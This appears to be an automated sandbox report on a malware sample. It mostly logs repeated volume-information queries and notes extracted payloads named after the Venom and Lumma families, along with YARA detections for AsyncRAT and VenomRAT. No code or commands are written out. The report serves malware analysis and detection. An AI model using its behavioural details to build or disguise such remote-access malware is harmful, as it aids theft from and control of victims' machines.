Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\BD9E.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 18_2_6CA887EE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

18_2_6CA887EE

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 18.2.vm.exe.29e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vm.exe.29e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 5252, type: MEMORYSTR

